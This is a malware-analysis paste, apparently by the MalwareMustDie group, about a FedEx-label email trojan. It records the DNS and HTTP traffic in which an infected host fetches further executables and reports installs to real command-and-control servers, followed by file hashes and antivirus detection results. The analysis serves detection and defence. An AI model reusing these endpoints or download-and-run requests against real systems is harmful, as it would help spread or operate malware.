#MMD FedEX(mail attachment - Label_Fedex_Print_document.zip)

MalwareMustDie Oct 20th, 2012
DNS:
108.236.160.217.in-addr.arpa: type PTR, class IN, s15383432.domainepardefaut.fr
sryfa.jvuydaas.tk: type A, class IN, addr 85.17.58.87

GET /2c21509821B51FE8A635B27547A4C6EE32F1AFC945611FBC3C2432BDDB871111DBC6B42D3E54F31FC40EC842203F406DC2DF061FFAD958364B3386EAD222A5E122F71DA508A105B2FF32 HTTP/1.0
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 217.160.236.108:84

HTTP/1.1 200 OK
Server: nginx/1.2.3
Date: Tue, 16 Oct 2012 19:17:59 GMT
Content-Type: text/html
Content-Length: 49
Connection: close
X-Powered-By: PHP/5.4.4-7
Vary: Accept-Encoding

c=run&u=/get/faa91cf5e79a76602f094ed38fad5872.exe

GET //get/faa91cf5e79a76602f094ed38fad5872.exe HTTP/1.0
Accept: */*
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 217.160.236.108:84

HTTP/1.1 200 OK
Server: nginx/1.2.3
Date: Tue, 16 Oct 2012 19:17:59 GMT
Content-Type: application/x-msdos-program
Content-Length: 468480
Connection: close
Last-Modified: Tue, 16 Oct 2012 19:00:04 GMT
ETag: "ddc101-72600-4cc31c3021500"
Accept-Ranges: bytes

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.

GET /api/urls/?ts=b261bdc2&affid=70300 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Trident/5.0);(b:2600;c:INT-5560;l:07)
Host: 175.41.28.156
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Tue, 16 Oct 2012 19:19:41 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive

http://sryfa.jvuydaas.tk/update.1.0.exe?ts=b261bdc2&affid=70300

GET /update.1.0.exe?ts=b261bdc2&affid=7030 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Trident/5.0);(b:2600;c:INT-5560;l:07)
Host: sryfa.jvuydaas.tk
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

HTTP/1.1 200 OK
Date: Tue, 16 Oct 2012 17:16:41 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 15 Oct 2012 07:07:10 GMT
ETag: "13c810e-32000-afa34380"
Accept-Ranges: bytes
Content-Length: 204800
Connection: close
Content-Type: application/octet-stream

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.

GET /api/stats/install/?ts=b261bdc2&affid=70300&ver=3070010&group=srs HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Trident/5.0);(b:2600;c:INT-5560;l:07)
Host: 175.41.28.156
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Tue, 16 Oct 2012 19:21:44 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Content-Length: 0

$ md5sum.exe 1.bin Label_Fedex_Print_document.exe 4D726CFC1DE95098002C4D7240DAA130/4D726CFC1DE95098002C4D7240DAA130.exe
2c487ba4f99e1a712214977fd1b1529b *1.bin
57d9b0652f253933df251624b3965c52 *Label_Fedex_Print_document.exe
837725339650aac6625fa4a05e0e96e1 *4D726CFC1DE95098002C4D7240DAA130/4D726CFC1DE95098002C4D7240DAA130.exe

$ ls -l 1.bin Label_Fedex_Print_document.exe 4D726CFC1DE95098002C4D7240DAA130/4D726CFC1DE95098002C4D7240DAA130.exe
----------+ 1 Tom None 204800 Oct 16 22:23 1.bin
----------+ 1 Tom None 468480 Oct 16 21:19 4D726CFC1DE95098002C4D7240DAA130/4D726CFC1DE95098002C4D7240DAA130.exe
----------+ 1 Tom None  53760 Oct 16 00:53 Label_Fedex_Print_document.exe

https://www.virustotal.com/file/0ae0dae36605e4dd0f0c841436f9517706b5b95c850e0cf2b0af6eaf05f311eb/analysis/

SHA256:         0ae0dae36605e4dd0f0c841436f9517706b5b95c850e0cf2b0af6eaf05f311eb
SHA1:           8ed84aca99321ca2257822bfd8814b87e89aaa27
MD5:            57d9b0652f253933df251624b3965c52
File size:      52.5 KB ( 53760 bytes )
File name:      1350392715.Label_Fedex_Print_document.exe
File type:      Win32 EXE
Tags:           peexe bobsoft
Detection ratio:        10 / 43
Analysis date:  2012-10-16 13:03:27 UTC ( 7 hours, 30 minutes ago )

Avast                   Win32:Trojan-gen                        20121016
ESET-NOD32              a variant of Win32/Injector.XTQ         20121016
Ikarus                  Trojan.Win32.FakeAV                     20121016
Kaspersky               HEUR:Trojan.Win32.Generic               20121016
Kingsoft                Win32.Troj.Undef.(kcloud)               20121008
Norman                  W32/Kryptik.BVX                         20121016
Sophos                  Troj/Agent-YGO                          20121016
Symantec                Trojan.Fakeavlock                       20121016
TrendMicro              BKDR_ANDROM.AR                          20121016
TrendMicro-HouseCall    BKDR_ANDROM.AR                          20121016

https://www.virustotal.com/file/0ae0dae36605e4dd0f0c841436f9517706b5b95c850e0cf2b0af6eaf05f311eb/analysis/1350419657/

SHA256:         0ae0dae36605e4dd0f0c841436f9517706b5b95c850e0cf2b0af6eaf05f311eb
SHA1:           8ed84aca99321ca2257822bfd8814b87e89aaa27
MD5:            57d9b0652f253933df251624b3965c52
File size:      52.5 KB ( 53760 bytes )
File name:      Label_Fedex_Print_document.exe
File type:      Win32 EXE
Detection ratio:        19 / 43
Analysis date:  2012-10-16 20:34:17 UTC ( 0 minutes ago )

AntiVir                 TR/Oficla.llooima                       20121016
Avast                   Win32:Trojan-gen                        20121016
Commtouch               W32/Trojan3.EDK                         20121016
ESET-NOD32              a variant of Win32/Injector.XTQ         20121016
F-Prot                  W32/Trojan3.EDK                         20121016
Fortinet                W32/Agent.YGO!tr                        20121016
Ikarus                  Trojan.Win32.FakeAV                     20121016
Kaspersky               HEUR:Trojan.Win32.Generic               20121016
Kingsoft                Win32.Troj.Undef.(kcloud)               20121008
McAfee                  Generic.tfr!cp                          20121016
Microsoft               TrojanDownloader:Win32/Kuluoz.B         20121016
MicroWorld-eScan        Gen:Variant.Symmi.3147                  20121016
Norman                  W32/Kryptik.BVX                         20121016
Panda                   Suspicious file                         20121016
PCTools                 Trojan.Fakeavlock                       20121016
Sophos                  Troj/Agent-YGO                          20121016
Symantec                Trojan.Fakeavlock                       20121016
TrendMicro              BKDR_ANDROM.AR                          20121016
TrendMicro-HouseCall    BKDR_ANDROM.AR                          20121016

https://www.virustotal.com/file/a7d9c7b32411a3bbf1c757562b58f02387f1cfaeb0737d1c1fad7f3acfe410c5/analysis/

SHA256:         a7d9c7b32411a3bbf1c757562b58f02387f1cfaeb0737d1c1fad7f3acfe410c5
SHA1:           cdc423285c40b9dcb752bbf23e96afd5a93a26ee
MD5:            2c487ba4f99e1a712214977fd1b1529b
File size:      200.0 KB ( 204800 bytes )
File name:      update.1.0.exe
File type:      Win32 EXE
Tags:           peexe
Detection ratio:        3 / 43
Analysis date:  2012-10-16 20:35:27 UTC ( 2 minutes ago )

Fortinet                W32/Krypt.ABK!tr                        20121016
Kaspersky               Backdoor.Win32.Papras.fts               20121016
TrendMicro-HouseCall    TROJ_GEN.RC1H1JG                        20121016

https://www.virustotal.com/file/a7d9c7b32411a3bbf1c757562b58f02387f1cfaeb0737d1c1fad7f3acfe410c5/analysis/1350419889/

SHA256:         a7d9c7b32411a3bbf1c757562b58f02387f1cfaeb0737d1c1fad7f3acfe410c5
SHA1:           cdc423285c40b9dcb752bbf23e96afd5a93a26ee
MD5:            2c487ba4f99e1a712214977fd1b1529b
File size:      200.0 KB ( 204800 bytes )
File name:      1.bin
File type:      Win32 EXE
Detection ratio:        3 / 43
Analysis date:  2012-10-16 20:38:09 UTC ( 0 minutes ago )

Fortinet                W32/Krypt.ABK!tr                        20121016
Kaspersky               Backdoor.Win32.Papras.fts               20121016
TrendMicro-HouseCall    TROJ_GEN.RC1H1JG                        20121016

First seen by VirusTotal
2012-10-16 15:28:54 UTC ( 5 hours, 13 minutes ago )

Last seen by VirusTotal
2012-10-16 20:39:33 UTC ( 2 minutes ago )

File names (max. 25)
    1.bin
    update.1.0.exe
    DRWEB32.EXE
    DRWEB

https://www.virustotal.com/file/63f914ce3072b60b296e9d9b4ea65a736098529e42abcd6cca1b3899fab861a6/analysis/1350419889/

SHA256:         63f914ce3072b60b296e9d9b4ea65a736098529e42abcd6cca1b3899fab861a6
SHA1:           731d256bffe4280a6c13e66b85454d01134d75ee
MD5:            837725339650aac6625fa4a05e0e96e1
File size:      457.5 KB ( 468480 bytes )
File name:      4D726CFC1DE95098002C4D7240DAA130.exe
File type:      Win32 EXE
Detection ratio:        7 / 43
Analysis date:  2012-10-16 20:38:09 UTC ( 0 minutes ago )

DrWeb                   Trojan.Fakealert.34171                  20121016
ESET-NOD32              Win32/Adware.SystemSecurity.AL          20121016
Fortinet                W32/FakeAV.NTP!tr                       20121016
Kaspersky               UDS:DangerousObject.Multi.Generic       20121016
McAfee                  FakeAlert-SecurityTool.fo               20121016
MicroWorld-eScan        Gen:Variant.Strictor.8753               20121016
Norman                  W32/FakeAV.BJTK                         20121016